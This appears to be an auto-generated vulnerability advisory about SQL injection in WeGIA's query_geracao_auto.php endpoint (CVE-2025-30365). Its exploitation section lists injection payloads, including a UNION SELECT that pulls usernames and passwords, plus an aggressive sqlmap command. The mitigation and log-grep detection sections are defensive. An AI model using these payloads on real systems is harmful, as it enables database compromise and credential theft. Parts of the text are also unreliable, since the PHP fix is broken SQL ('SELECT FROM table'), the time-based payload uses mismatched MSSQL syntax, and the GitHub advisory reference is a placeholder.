How CVE-2025-30365 Works
The vulnerability exists in WeGIA versions before 3.2.8 due to improper input sanitization in the `/WeGIA/html/socio/sistema/controller/query_geracao_auto.php` endpoint. Attackers can manipulate the `query` parameter to inject malicious SQL commands. Since the application directly concatenates user-supplied input into SQL queries without parameterization, attackers can bypass authentication, extract sensitive data, or execute arbitrary database operations. The flaw stems from insufficient validation in PHP backend logic, allowing UNION-based or blind SQLi techniques.
DailyCVE Form:
Platform: WeGIA
Version: <3.2.8
Vulnerability: SQL Injection
Severity: Critical
Date: 04/10/2025
What Undercode Say:
Exploitation:
1. Detection:
curl "http://target/WeGIA/html/socio/sistema/controller/query_geracao_auto.php?query=' OR 1=1--"
2. Blind SQLi Time-Based:
query='; IF (1=1) WAITFOR DELAY '0:0:5'--
3. Data Exfiltration:
GET /query_geracao_auto.php?query=1 UNION SELECT username,password FROM users--
Mitigation:
1. Patch: Upgrade to WeGIA 3.2.8.
2. WAF Rules:
location ~ query_geracao_auto.php {
deny all;
}
3. PHP Fix:
$stmt = $pdo->prepare("SELECT FROM table WHERE id = ?");
$stmt->execute([$input]);
Analytics:
- CVSS 4.0: 9.4 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H).
- Exploitability: Remote, low complexity.
- Impact: Full database compromise.
Detection Tools:
sqlmap -u "http://target/query_geracao_auto.php?query=1" --risk=3 --level=5
Log Analysis:
grep "query_geracao_auto.php" /var/log/apache2/access.log | grep -E "UNION|SELECT|WAITFOR"
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-30365
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-30365
Extra Source Hub:
Undercode
